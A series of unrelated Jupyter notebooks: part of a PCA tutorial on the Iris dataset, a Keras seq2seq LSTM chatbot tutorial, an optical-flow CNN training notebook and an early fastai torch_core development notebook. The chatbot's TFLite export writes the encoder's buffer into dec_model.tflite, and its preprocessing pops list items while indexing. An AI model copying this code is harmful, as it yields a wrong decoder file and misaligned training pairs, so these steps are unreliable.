Hence, the $Var(Z_1)= \phi_1^T E[X X^T] \phi_1 = \phi_1^T C \phi_1$
Apart from finding the largest sample variance, we also constrain the loadings so that their sum of squares is equal to one, since otherwise setting these elements to be arbitrarily large in absolute value could result in an arbitrarily large variance. More formally,
$$\sum_{j=1}^{p}\phi_{j1}^2=1$$
In other words, the first principal component loading vector solves the optimization problem
$$\text{maximize}_\phi \quad \phi^TC\phi$$
$$\text{subject to} \sum_{j=1}^{p}\phi_{j1}^2 = \phi_1^T \phi_1 =1$$
This objective function can be solved by the Lagrange multiplier, minimizing the loss function:
$$L = \phi^T C\phi - \lambda(\phi^T \phi-1)$$
Next, to solve for $\phi$, we set the partial derivative of L with respect to $\phi$ to 0.
$$\frac{\partial L}{\partial \phi_1} = C\phi - \lambda \phi_1 =0 $$
$$ C\phi_1 = \lambda \phi_1 $$
Surprisingly we see that it is actually a eigendecomposition problem. To refresh our mind a little bit, here is a very good [youtube video](https://www.youtube.com/watch?v=PFDu9oVAE-g&index=14&list=PLZHQObOWTQDPD3MizzM2xVFitgF8hE_ab) explaining what eigenvalue and eigenvector is in a very geometrical way.
Therefore, from the equation above, we pick $\phi$ as the eigenvector associated with the largest eigenvalue.
Also, most data can’t be well-described by a single principal component. Typically, we compute multiple principal components by computing all eigenvectors of the covariance matrix of $X$ and ranking them by their eigenvalues. After sorting the eigenpairs, the next question is “how many principal components are we going to choose for our new feature subspace?” A useful measure is the so-called “explained variance,” which can be calculated from the eigenvalues. The explained variance tells us how much information (variance) can be attributed to each of the principal components.
To sum up, here are the **steps that we take to perform a PCA analysis**
1. Standardize the data.
2. Obtain the Eigenvectors and Eigenvalues from the covariance matrix (technically the correlation matrix after performing the standardization).
3. Sort eigenvalues in descending order and choose the k eigenvectors that correspond to the k largest eigenvalues where k is the number of dimensions of the new feature subspace.
4. Projection onto the new feature space. During this step we will take the top k eigenvectors and use it to transform the original dataset X to obtain a k-dimensional feature subspace X′.
---
## <a id="process">PCA Analysis Example</a>
Let's use the classical IRIS data to illustrate the topics that we just covered, including
* What are the explained variance of each component? How many component should we pick?
* How will the scatter plot be if we plot in the dimension of first and second component?
```
# Read Data
df = pd.read_csv(
filepath_or_buffer='https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data',
header=None,
sep=',')
df.columns=['sepal_len', 'sepal_wid', 'petal_len', 'petal_wid', 'class']
df.dropna(how="all", inplace=True) # drops the empty line at file-end
df.tail()
# split data table into data X and class labels y
X = df.iloc[:,0:4].values
y = df.iloc[:,4].values
```
**EDA**
To get a feeling for how the 3 different flower classes are distributes along the 4 different features, let us visualize them via histograms.
```
def plot_iris():
label_dict = {1: 'Iris-Setosa',
2: 'Iris-Versicolor',
3: 'Iris-Virgnica'}
feature_dict = {0: 'sepal length [cm]',
1: 'sepal width [cm]',
2: 'petal length [cm]',
3: 'petal width [cm]'}
with plt.style.context('seaborn-whitegrid'):
plt.figure(figsize=(8, 6))
for cnt in range(4):
plt.subplot(2, 2, cnt+1)
for lab in ('Iris-setosa', 'Iris-versicolor', 'Iris-virginica'):
plt.hist(X[y==lab, cnt],
label=lab,
bins=10,
alpha=0.3,)
plt.xlabel(feature_dict[cnt])
plt.legend(loc='upper right', fancybox=True, fontsize=8)
plt.tight_layout()
plt.show()
plot_iris()
```
## Process
### 1. Standardize the data
```
# create a StandardScaler object
scaler = StandardScaler()
# fit and then transform to get the standardized dataset
scaler.fit(X)
X_std = scaler.transform(X)
```
### 2. Do eigendecomposition and sort eigenvalues in descending order
```
# n_components: Number of components to keep
# if n_components is not set all components are kept
my_pca = PCA(n_components=None)
my_pca.fit(X_std)
def plot_var_explained(var_exp, figsize=(6,4)):
"""variance explained per component plot"""
# get culmulative variance explained
cum_var_exp = np.cumsum(var_exp)
# plot
with plt.style.context('seaborn-whitegrid'):
plt.figure(figsize=figsize)
plt.bar(range(len(var_exp)), var_exp, alpha=0.5, align='center',
label='individual explained variance')
plt.step(range(len(var_exp)), cum_var_exp, where='mid',
label='cumulative explained variance')
plt.ylabel('Explained variance ratio')
plt.xlabel('Principal components')
plt.legend(loc='best')
plt.tight_layout()
plt.show()
var_exp = my_pca.explained_variance_ratio_
plot_var_explained(var_exp, figsize=(6,4))
# plot a simpler version of the bar chart
pd.DataFrame(my_pca.explained_variance_ratio_).plot.bar()
```
The plot above clearly shows that most of the variance (72.77% of the variance to be precise) can be explained by the first principal component alone. The second principal component still bears some information (23.03%) while the third and fourth principal components can safely be dropped without losing to much information. Together, the first two principal components contain 95.8% of the information.
### 3. Check the scores within each principal component
```
PC_df = pd.DataFrame(my_pca.components_,columns=df.iloc[:,0:4].columns).transpose()
PC_df
import seaborn as sns
plt.figure(figsize=None) #(4,4)
sns.heatmap(PC_df,cmap="RdBu_r",annot=PC_df.values, linewidths=1, center=0)
```
From the above heatmap & table, we can see that first component consist of all 4 features with a smaller weight on sepal_wid
### 4. Projection onto the new feature space
During this step we will take the top k eigenvectors and use it to transform the original dataset X to obtain a k-dimensional feature subspace X′.
```
sklearn_pca = PCA(n_components=2)
Y_sklearn = sklearn_pca.fit_transform(X_std)
Y_sklearn[1:10]
```
Each of the list in the array above shows the projected value of each observation onto the first two principal components. If we want to fit model using the data projected on to their first 2 principal component, then `Y_sklearn` is the data we want to use.
## <a id="usage">PCA Usage</a>
### Data Visualization
We can use PCA as a tool for data visualization. For instance, if we can obtain a two-dimensional representation of the data that captures most of the information, then we can plot hte observations in this low-dimensional space.
Let's see how it will be like using IRIS data if we plot it out in the first two principal components.
```
with plt.style.context('seaborn-whitegrid'):
plt.figure(figsize=(6, 4))
for lab, col in zip(('Iris-setosa', 'Iris-versicolor', 'Iris-virginica'),
('blue', 'red', 'green')):
print(lab)
print(col)
plt.scatter(Y_sklearn[y==lab, 0],
Y_sklearn[y==lab, 1],
label=lab,
c=col)
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.legend(loc='lower center')
plt.tight_layout()
plt.show()
```
### Principal Component Regression
We can use princial components as predictors in a regression model in place of the original larger set of variables.
Let's compare the result of logistic regression using all the features with the one using only the first two component
```
# the code is copied from Ethen's PCA blog post, which is listed in the reference.
# split 30% of the iris data into a test set for evaluation
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size = 0.3, random_state = 1)
# create the pipeline, where we'll
# standardize the data, perform PCA and
# fit the logistic regression
pipeline1 = Pipeline([
('standardize', StandardScaler()),
('pca', PCA(n_components = 2)),
('logistic', LogisticRegression(random_state = 1))
])
pipeline1.fit(X_train, y_train)
y_pred1 = pipeline1.predict(X_test)
# pipeline without PCA
pipeline2 = Pipeline([
('standardize', StandardScaler()),
('logistic', LogisticRegression(random_state = 1))
])
pipeline2.fit(X_train, y_train)
y_pred2 = pipeline2.predict(X_test)
# access the prediction accuracy
print('PCA Accuracy %.3f' % accuracy_score(y_test, y_pred1))
print('Accuracy %.3f' % accuracy_score(y_test, y_pred2))
```
We saw that by using only the first two component, the accuracy only drop by 0.022, which is about 2-3% from the original accuracy. Actually, by using the first three principal component, we can get the same accuracy as the original model with all the features.
### Reference
* [PCA in 3 steps](http://sebastianraschka.com/Articles/2015_pca_in_3_steps.html)
* [Everything you did and didn't know about PCA
](http://alexhwilliams.info/itsneuronalblog/2016/03/27/pca/)
* [Ethen: Principal Component Analysis (PCA) from scratch](http://nbviewer.jupyter.org/github/ethen8181/machine-learning/blob/master/dim_reduct/PCA.ipynb)
* [Wiki: Matrix Multiplication](https://en.wikipedia.org/wiki/Matrix_multiplication)
* [Sklearn: Pipelining: chaining a PCA and a logistic regression](http://scikit-learn.org/stable/auto_examples/plot_digits_pipe.html#sphx-glr-auto-examples-plot-digits-pipe-py)
|
github_jupyter
|
# Chatbot using Seq2Seq LSTM models
In this notebook, we will assemble a seq2seq LSTM model using Keras Functional API to create a working Chatbot which would answer questions asked to it.
Chatbots have become applications themselves. You can choose the field or stream and gather data regarding various questions. We can build a chatbot for an e-commerce webiste or a school website where parents could get information about the school.
Messaging platforms like Allo have implemented chatbot services to engage users. The famous [Google Assistant](https://assistant.google.com/), [Siri](https://www.apple.com/in/siri/), [Cortana](https://www.microsoft.com/en-in/windows/cortana) and [Alexa](https://www.alexa.com/) may have been build using simialr models.
So, let's start building our Chatbot.
## 1) Importing the packages
We will import [TensorFlow](https://www.tensorflow.org) and our beloved [Keras](https://www.tensorflow.org/guide/keras). Also, we import other modules which help in defining model layers.
```
import numpy as np
import tensorflow as tf
import pickle
from tensorflow.keras import layers , activations , models , preprocessing
```
## 2) Preprocessing the data
### A) Download the data
The dataset hails from [chatterbot/english on Kaggle](https://www.kaggle.com/kausr25/chatterbotenglish).com by [kausr25](https://www.kaggle.com/kausr25). It contains pairs of questions and answers based on a number of subjects like food, history, AI etc.
The raw data could be found from this repo -> https://github.com/shubham0204/Dataset_Archives
```
!wget https://github.com/shubham0204/Dataset_Archives/blob/master/chatbot_nlp.zip?raw=true -O chatbot_nlp.zip
!unzip chatbot_nlp.zip
```
### B) Reading the data from the files
We parse each of the `.yaml` files.
* Concatenate two or more sentences if the answer has two or more of them.
* Remove unwanted data types which are produced while parsing the data.
* Append `<START>` and `<END>` to all the `answers`.
* Create a `Tokenizer` and load the whole vocabulary ( `questions` + `answers` ) into it.
```
from tensorflow.keras import preprocessing , utils
import os
import yaml
dir_path = 'chatbot_nlp/data'
files_list = os.listdir(dir_path + os.sep)
questions = list()
answers = list()
for filepath in files_list:
stream = open( dir_path + os.sep + filepath , 'rb')
docs = yaml.safe_load(stream)
conversations = docs['conversations']
for con in conversations:
if len( con ) > 2 :
questions.append(con[0])
replies = con[ 1 : ]
ans = ''
for rep in replies:
ans += ' ' + rep
answers.append( ans )
elif len( con )> 1:
questions.append(con[0])
answers.append(con[1])
answers_with_tags = list()
for i in range( len( answers ) ):
if type( answers[i] ) == str:
answers_with_tags.append( answers[i] )
else:
questions.pop( i )
answers = list()
for i in range( len( answers_with_tags ) ) :
answers.append( '<START> ' + answers_with_tags[i] + ' <END>' )
tokenizer = preprocessing.text.Tokenizer()
tokenizer.fit_on_texts( questions + answers )
VOCAB_SIZE = len( tokenizer.word_index )+1
print( 'VOCAB SIZE : {}'.format( VOCAB_SIZE ))
```
### C) Preparing data for Seq2Seq model
Our model requires three arrays namely `encoder_input_data`, `decoder_input_data` and `decoder_output_data`.
For `encoder_input_data` :
* Tokenize the `questions`. Pad them to their maximum length.
For `decoder_input_data` :
* Tokenize the `answers`. Pad them to their maximum length.
For `decoder_output_data` :
* Tokenize the `answers`. Remove the first element from all the `tokenized_answers`. This is the `<START>` element which we added earlier.
```
from gensim.models import Word2Vec
import re
vocab = []
for word in tokenizer.word_index:
vocab.append( word )
def tokenize( sentences ):
tokens_list = []
vocabulary = []
for sentence in sentences:
sentence = sentence.lower()
sentence = re.sub( '[^a-zA-Z]', ' ', sentence )
tokens = sentence.split()
vocabulary += tokens
tokens_list.append( tokens )
return tokens_list , vocabulary
#p = tokenize( questions + answers )
#model = Word2Vec( p[ 0 ] )
#embedding_matrix = np.zeros( ( VOCAB_SIZE , 100 ) )
#for i in range( len( tokenizer.word_index ) ):
#embedding_matrix[ i ] = model[ vocab[i] ]
# encoder_input_data
tokenized_questions = tokenizer.texts_to_sequences( questions )
maxlen_questions = max( [ len(x) for x in tokenized_questions ] )
padded_questions = preprocessing.sequence.pad_sequences( tokenized_questions , maxlen=maxlen_questions , padding='post' )
encoder_input_data = np.array( padded_questions )
print( encoder_input_data.shape , maxlen_questions )
# decoder_input_data
tokenized_answers = tokenizer.texts_to_sequences( answers )
maxlen_answers = max( [ len(x) for x in tokenized_answers ] )
padded_answers = preprocessing.sequence.pad_sequences( tokenized_answers , maxlen=maxlen_answers , padding='post' )
decoder_input_data = np.array( padded_answers )
print( decoder_input_data.shape , maxlen_answers )
# decoder_output_data
tokenized_answers = tokenizer.texts_to_sequences( answers )
for i in range(len(tokenized_answers)) :
tokenized_answers[i] = tokenized_answers[i][1:]
padded_answers = preprocessing.sequence.pad_sequences( tokenized_answers , maxlen=maxlen_answers , padding='post' )
onehot_answers = utils.to_categorical( padded_answers , VOCAB_SIZE )
decoder_output_data = np.array( onehot_answers )
print( decoder_output_data.shape )
```
## 3) Defining the Encoder-Decoder model
The model will have Embedding, LSTM and Dense layers. The basic configuration is as follows.
* 2 Input Layers : One for `encoder_input_data` and another for `decoder_input_data`.
* Embedding layer : For converting token vectors to fix sized dense vectors. **( Note : Don't forget the `mask_zero=True` argument here )**
* LSTM layer : Provide access to Long-Short Term cells.
Working :
1. The `encoder_input_data` comes in the Embedding layer ( `encoder_embedding` ).
2. The output of the Embedding layer goes to the LSTM cell which produces 2 state vectors ( `h` and `c` which are `encoder_states` )
3. These states are set in the LSTM cell of the decoder.
4. The decoder_input_data comes in through the Embedding layer.
5. The Embeddings goes in LSTM cell ( which had the states ) to produce seqeunces.
<center><img style="float: center;" src="https://cdn-images-1.medium.com/max/1600/1*bnRvZDDapHF8Gk8soACtCQ.gif"></center>
Image credits to [Hackernoon](https://hackernoon.com/tutorial-3-what-is-seq2seq-for-text-summarization-and-why-68ebaa644db0).
```
encoder_inputs = tf.keras.layers.Input(shape=( maxlen_questions , ))
encoder_embedding = tf.keras.layers.Embedding( VOCAB_SIZE, 200 , mask_zero=True ) (encoder_inputs)
encoder_outputs , state_h , state_c = tf.keras.layers.LSTM( 200 , return_state=True )( encoder_embedding )
encoder_states = [ state_h , state_c ]
decoder_inputs = tf.keras.layers.Input(shape=( maxlen_answers , ))
decoder_embedding = tf.keras.layers.Embedding( VOCAB_SIZE, 200 , mask_zero=True) (decoder_inputs)
decoder_lstm = tf.keras.layers.LSTM( 200 , return_state=True , return_sequences=True )
decoder_outputs , _ , _ = decoder_lstm ( decoder_embedding , initial_state=encoder_states )
decoder_dense = tf.keras.layers.Dense( VOCAB_SIZE , activation=tf.keras.activations.softmax )
output = decoder_dense ( decoder_outputs )
model = tf.keras.models.Model([encoder_inputs, decoder_inputs], output )
model.compile(optimizer=tf.keras.optimizers.RMSprop(), loss='categorical_crossentropy')
model.summary()
```
## 4) Training the model
We train the model for a number of epochs with `RMSprop` optimizer and `categorical_crossentropy` loss function.
```
model.fit([encoder_input_data , decoder_input_data], decoder_output_data, batch_size=50, epochs=150 )
model.save( 'model.h5' )
```
## 5) Defining inference models
We create inference models which help in predicting answers.
**Encoder inference model** : Takes the question as input and outputs LSTM states ( `h` and `c` ).
**Decoder inference model** : Takes in 2 inputs, one are the LSTM states ( Output of encoder model ), second are the answer input seqeunces ( ones not having the `<start>` tag ). It will output the answers for the question which we fed to the encoder model and its state values.
```
def make_inference_models():
encoder_model = tf.keras.models.Model(encoder_inputs, encoder_states)
decoder_state_input_h = tf.keras.layers.Input(shape=( 200 ,))
decoder_state_input_c = tf.keras.layers.Input(shape=( 200 ,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(
decoder_embedding , initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = tf.keras.models.Model(
[decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
return encoder_model , decoder_model
```
## 6) Talking with our Chatbot
First, we define a method `str_to_tokens` which converts `str` questions to Integer tokens with padding.
```
def str_to_tokens( sentence : str ):
words = sentence.lower().split()
tokens_list = list()
for word in words:
tokens_list.append( tokenizer.word_index[ word ] )
return preprocessing.sequence.pad_sequences( [tokens_list] , maxlen=maxlen_questions , padding='post')
```
1. First, we take a question as input and predict the state values using `enc_model`.
2. We set the state values in the decoder's LSTM.
3. Then, we generate a sequence which contains the `<start>` element.
4. We input this sequence in the `dec_model`.
5. We replace the `<start>` element with the element which was predicted by the `dec_model` and update the state values.
6. We carry out the above steps iteratively till we hit the `<end>` tag or the maximum answer length.
```
enc_model , dec_model = make_inference_models()
for _ in range(10):
states_values = enc_model.predict( str_to_tokens( input( 'Enter question : ' ) ) )
empty_target_seq = np.zeros( ( 1 , 1 ) )
empty_target_seq[0, 0] = tokenizer.word_index['start']
stop_condition = False
decoded_translation = ''
while not stop_condition :
dec_outputs , h , c = dec_model.predict([ empty_target_seq ] + states_values )
sampled_word_index = np.argmax( dec_outputs[0, -1, :] )
sampled_word = None
for word , index in tokenizer.word_index.items() :
if sampled_word_index == index :
decoded_translation += ' {}'.format( word )
sampled_word = word
if sampled_word == 'end' or len(decoded_translation.split()) > maxlen_answers:
stop_condition = True
empty_target_seq = np.zeros( ( 1 , 1 ) )
empty_target_seq[ 0 , 0 ] = sampled_word_index
states_values = [ h , c ]
print( decoded_translation )
```
## 7) Conversion to TFLite ( Optional )
We can convert our seq2seq model to a TensorFlow Lite model so that we can use it on edge devices.
```
!pip install tf-nightly
converter = tf.lite.TFLiteConverter.from_keras_model( enc_model )
buffer = converter.convert()
open( 'enc_model.tflite' , 'wb' ).write( buffer )
converter = tf.lite.TFLiteConverter.from_keras_model( dec_model )
open( 'dec_model.tflite' , 'wb' ).write( buffer )
```
|
github_jupyter
|
```
from config import *
import mPyPl as mp
from mPyPl.utils.flowutils import *
from mpyplx import *
from pipe import Pipe
from functools import partial
import numpy as np
import cv2
import itertools
from moviepy.editor import *
import pickle
import functools
from config import *
test_names = (
from_json(os.path.join(source_dir,'matches.json'))
| mp.where(lambda x: 'Test' in x.keys() and int(x['Test'])>0)
| mp.apply(['Id','Half'],'pattern',lambda x: "{}_{}_".format(x[0],x[1]))
| mp.select_field('pattern')
| mp.as_list
)
stream = (
mp.get_datastream(data_dir, ext=".fflow.pickle", classes={'noshot' : 0, 'shots': 1})
| datasplit_by_pattern(test_pattern=test_names)
| stratify_sample_tt()
| mp.apply(['class_id','split'],'descr',lambda x: "{}-{}".format(x[0],x[1]))
| summarize('descr')
| mp.as_list
)
train, test = (
stream
| mp.apply('filename', 'raw', lambda x: pickle.load(open(x, 'rb')), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('raw', 'gradients', calc_gradients, eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('gradients', 'polar', lambda x: to_polar(x), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('polar', 'channel1', lambda x: np.concatenate([y[0] for y in x]), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('polar', 'channel2', lambda x: np.concatenate([y[1] for y in x]), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.make_train_test_split()
)
train = train | mp.as_list
ch1 = stream | mp.select_field('channel1') | mp.as_list
ch1_flatten = np.concatenate(ch1)
ch2 = stream | mp.select_field('channel2') | mp.as_list
ch2_flatten = np.concatenate(ch2)
%matplotlib inline
import matplotlib.pyplot as plt
plt.hist(ch1_flatten, bins=100);
plt.hist(ch2_flatten, bins=100);
```
## OpticalFlow Model Training
```
scene_changes = pickle.load(open('scene.changes.pkl', 'rb'))
scene_changes = list(scene_changes[40].keys())
scene_changes = [ fn.replace('.resized.mp4', '.fflow.pickle') for fn in scene_changes]
retinaflow_shape = (25, 50, 2)
hist_params = [
dict(
bins=retinaflow_shape[1],
lower=0,
upper=150,
maxv=150
),
dict(
bins=retinaflow_shape[1],
lower=0,
upper=6.29,
maxv=6.29
),
]
stream = (
mp.get_datastream(data_dir, ext=".fflow.pickle", classes={'noshot' : 0, 'shots': 1})
| mp.filter('filename', lambda x: not x in scene_changes)
| datasplit_by_pattern(test_pattern=test_names)
| stratify_sample_tt()
| mp.apply(['class_id','split'],'descr',lambda x: "{}-{}".format(x[0],x[1]))
| summarize('descr')
| mp.as_list
)
train, test = (
stream
| mp.apply('filename', 'raw', lambda x: pickle.load(open(x, 'rb')), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('raw', 'gradients', calc_gradients, eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('gradients', 'polar', lambda x: to_polar(x), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('polar', 'histograms', lambda x: video_to_hist(x, hist_params), eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.apply('histograms', 'fflows', functools.partial(zero_pad,shape=retinaflow_shape),
eval_strategy=mp.EvalStrategies.LazyMemoized)
| mp.make_train_test_split()
)
no_train = stream | mp.filter('split',lambda x: x==mp.SplitType.Train) | mp.count
no_test = stream | mp.filter('split',lambda x: x==mp.SplitType.Test) | mp.count
# training params
LEARNING_RATE = 0.001
V = "v1"
MODEL_CHECKPOINT = "models/unet_ch_" + V + ".h5"
MODEL_PATH = MODEL_CHECKPOINT.replace("_ch_", "_model_")
HISTORY_PATH = MODEL_PATH.replace(".h5", "_history.pkl")
BATCH_SIZE = 16
EPOCHS = 50
from keras.callbacks import ModelCheckpoint
from keras.callbacks import EarlyStopping
callback_checkpoint = ModelCheckpoint(
MODEL_CHECKPOINT,
verbose=1,
monitor='val_loss',
save_best_only=True
)
callback_stopping = EarlyStopping(
monitor='val_loss',
min_delta=0,
patience=7,
verbose=1,
mode='auto',
restore_best_weights=True
)
from keras.callbacks import ReduceLROnPlateau
reduce_lr = ReduceLROnPlateau(monitor='val_loss', verbose=1, factor=0.5,
patience=4, cooldown=4, min_lr=0.0001)
from keras.models import Sequential
from keras.layers import *
from keras.regularizers import l2
from keras.optimizers import Adam
retinaflow_shape = (25, 50, 2)
model = Sequential()
model.add(Conv2D(64, (5,3), input_shape=retinaflow_shape))
model.add(Conv2D(32, (3,3), activation='relu', kernel_initializer='glorot_uniform'))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dense(32, activation='relu', kernel_initializer='glorot_uniform'))
model.add(Dense(1, activation='sigmoid', kernel_initializer='glorot_uniform'))
model.compile(loss='binary_crossentropy',
optimizer=Adam(lr=0.001),
metrics=['acc'])
model.summary()
history = model.fit_generator(
train | mp.infshuffle | mp.as_batch('fflows', 'class_id', batchsize=BATCH_SIZE),
steps_per_epoch = no_train // BATCH_SIZE,
validation_data = test | mp.infshuffle | mp.as_batch('fflows', 'class_id', batchsize=BATCH_SIZE),
validation_steps = no_test // BATCH_SIZE,
epochs=EPOCHS,
verbose=1,
callbacks=[callback_checkpoint, callback_stopping, reduce_lr]
)
%matplotlib inline
import matplotlib.pyplot as plt
def plot_history(history):
loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' not in s]
val_loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' in s]
acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' not in s]
val_acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' in s]
if len(loss_list) == 0:
print('Loss is missing in history')
return
## As loss always exists
epochs = range(1,len(history.history[loss_list[0]]) + 1)
## Loss
plt.figure(1)
for l in loss_list:
plt.plot(epochs, history.history[l], 'b', label='Training loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))
for l in val_loss_list:
plt.plot(epochs, history.history[l], 'g', label='Validation loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))
plt.title('Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
## Accuracy
plt.figure(2)
for l in acc_list:
plt.plot(epochs, history.history[l], 'b', label='Training accuracy (' + str(format(history.history[l][-1],'.5f'))+')')
for l in val_acc_list:
plt.plot(epochs, history.history[l], 'g', label='Validation accuracy (' + str(format(history.history[l][-1],'.5f'))+')')
plt.title('Accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
plot_history(history)
```
|
github_jupyter
|
```
#default_exp torch_core
#export
from local.test import *
from local.imports import *
from local.torch_imports import *
from local.core import *
from local.notebook.showdoc import show_doc
#export
if torch.cuda.is_available(): torch.cuda.set_device(int(os.environ.get('DEFAULT_GPU') or 0))
```
# Torch Core
> Basic pytorch functions used in the fastai library
## Basics
```
#export
@patch
def __array_eq__(self:Tensor,b):
return torch.equal(self,b) if self.dim() else self==b
#export
def tensor(x, *rest, **kwargs):
"Like `torch.as_tensor`, but handle lists too, and can pass multiple vector elements directly."
if len(rest): x = (x,)+rest
# Pytorch bug in dataloader using num_workers>0
if isinstance(x, (tuple,list)) and len(x)==0: return tensor(0)
res = (torch.tensor(x, **kwargs) if isinstance(x, (tuple,list))
else as_tensor(x, **kwargs) if hasattr(x, '__array__')
else as_tensor(x, **kwargs) if is_listy(x)
else as_tensor(x, **kwargs) if is_iter(x)
else None)
if res is None:
res = as_tensor(array(x), **kwargs)
if res.dtype is torch.float64: return res.float()
if res.dtype is torch.int32:
warn('Tensor is int32: upgrading to int64; for better performance use int64 input')
return res.long()
return res
test_eq(tensor(array([1,2,3])), torch.tensor([1,2,3]))
test_eq(tensor(1,2,3), torch.tensor([1,2,3]))
test_eq_type(tensor(1.0), torch.tensor(1.0))
#export
def set_seed(s):
"Set random seed for `random`, `torch`, and `numpy` (where available)"
try: torch.manual_seed(s)
except NameError: pass
try: np.random.seed(s%(2**32-1))
except NameError: pass
random.seed(s)
set_seed(2*33)
a1 = np.random.random()
a2 = torch.rand(())
a3 = random.random()
set_seed(2*33)
b1 = np.random.random()
b2 = torch.rand(())
b3 = random.random()
test_eq(a1,b1)
test_eq(a2,b2)
test_eq(a3,b3)
#export
def _fa_rebuild_tensor (cls, *args, **kwargs): return cls(torch._utils._rebuild_tensor_v2(*args, **kwargs))
def _fa_rebuild_qtensor(cls, *args, **kwargs): return cls(torch._utils._rebuild_qtensor (*args, **kwargs))
#export
class TensorBase(Tensor, metaclass=BypassNewMeta):
def _new_meta(self, *args, **kwargs): return tensor(self)
def __reduce_ex__(self,proto):
torch.utils.hooks.warn_if_has_hooks(self)
args = (type(self), self.storage(), self.storage_offset(), tuple(self.size()), self.stride())
if self.is_quantized: args = args + (self.q_scale(), self.q_zero_point())
f = _fa_rebuild_qtensor if self.is_quantized else _fa_rebuild_tensor
return (f, args + (self.requires_grad, OrderedDict()))
#export
def _patch_tb():
def get_f(fn):
def _f(self, *args, **kwargs):
cls = self.__class__
res = getattr(super(TensorBase, self), fn)(*args, **kwargs)
return cls(res) if isinstance(res,Tensor) else res
return _f
t = tensor([1])
skips = '__class__ __deepcopy__ __delattr__ __dir__ __doc__ __getattribute__ __hash__ __init__ \
__init_subclass__ __new__ __reduce__ __reduce_ex__ __module__ __setstate__'.split()
for fn in dir(t):
if fn in skips: continue
f = getattr(t, fn)
if isinstance(f, (MethodWrapperType, BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType)):
setattr(TensorBase, fn, get_f(fn))
_patch_tb()
class _T(TensorBase): pass
t = _T(range(5))
test_eq_type(t[0], _T(0))
test_eq_type(t[:2], _T([0,1]))
test_eq_type(t+1, _T(range(1,6)))
test_eq(type(pickle.loads(pickle.dumps(t))), _T)
```
## L -
```
#export
@patch
def tensored(self:L):
"`mapped(tensor)`"
return self.mapped(tensor)
@patch
def stack(self:L, dim=0):
"Same as `torch.stack`"
return torch.stack(list(self.tensored()), dim=dim)
@patch
def cat (self:L, dim=0):
"Same as `torch.cat`"
return torch.cat (list(self.tensored()), dim=dim)
show_doc(L.tensored)
```
There are shortcuts for `torch.stack` and `torch.cat` if your `L` contains tensors or something convertible. You can manually convert with `tensored`.
```
t = L(([1,2],[3,4]))
test_eq(t.tensored(), [tensor(1,2),tensor(3,4)])
show_doc(L.stack)
test_eq(t.stack(), tensor([[1,2],[3,4]]))
show_doc(L.cat)
test_eq(t.cat(), tensor([1,2,3,4]))
```
## Chunks
```
#export
def concat(*ls):
"Concatenate tensors, arrays, lists, or tuples"
if not len(ls): return []
it = ls[0]
if isinstance(it,torch.Tensor): res = torch.cat(ls)
elif isinstance(it,ndarray): res = np.concatenate(ls)
else:
res = [o for x in ls for o in L(x)]
if isinstance(it,(tuple,list)): res = type(it)(res)
else: res = L(res)
return retain_type(res, it)
a,b,c = [1],[1,2],[1,1,2]
test_eq(concat(a,b), c)
test_eq_type(concat(tuple (a),tuple (b)), tuple (c))
test_eq_type(concat(array (a),array (b)), array (c))
test_eq_type(concat(tensor(a),tensor(b)), tensor(c))
test_eq_type(concat(TensorBase(a),TensorBase(b)), TensorBase(c))
test_eq_type(concat([1,1],1), [1,1,1])
test_eq_type(concat(1,1,1), L(1,1,1))
test_eq_type(concat(L(1,2),1), L(1,2,1))
#export
class Chunks:
"Slice and int indexing into a list of lists"
def __init__(self, chunks, lens=None):
self.chunks = chunks
self.lens = L(map(len,self.chunks) if lens is None else lens)
self.cumlens = np.cumsum(0+self.lens)
self.totlen = self.cumlens[-1]
def __getitem__(self,i):
if isinstance(i,slice): return self.getslice(i)
di,idx = self.doc_idx(i)
return self.chunks[di][idx]
def getslice(self, i):
st_d,st_i = self.doc_idx(ifnone(i.start,0))
en_d,en_i = self.doc_idx(ifnone(i.stop,self.totlen+1))
res = [self.chunks[st_d][st_i:(en_i if st_d==en_d else sys.maxsize)]]
for b in range(st_d+1,en_d): res.append(self.chunks[b])
if st_d!=en_d and en_d<len(self.chunks): res.append(self.chunks[en_d][:en_i])
return concat(*res)
def doc_idx(self, i):
if i<0: i=self.totlen+i # count from end
docidx = np.searchsorted(self.cumlens, i+1)-1
cl = self.cumlens[docidx]
return docidx,i-cl
docs = L(list(string.ascii_lowercase[a:b]) for a,b in ((0,3),(3,7),(7,8),(8,16),(16,24),(24,26)))
b = Chunks(docs)
test_eq([b[ o] for o in range(0,5)], ['a','b','c','d','e'])
test_eq([b[-o] for o in range(1,6)], ['z','y','x','w','v'])
test_eq(b[6:13], 'g,h,i,j,k,l,m'.split(','))
test_eq(b[20:77], 'u,v,w,x,y,z'.split(','))
test_eq(b[:5], 'a,b,c,d,e'.split(','))
test_eq(b[:2], 'a,b'.split(','))
t = torch.arange(26)
docs = L(t[a:b] for a,b in ((0,3),(3,7),(7,8),(8,16),(16,24),(24,26)))
b = Chunks(docs)
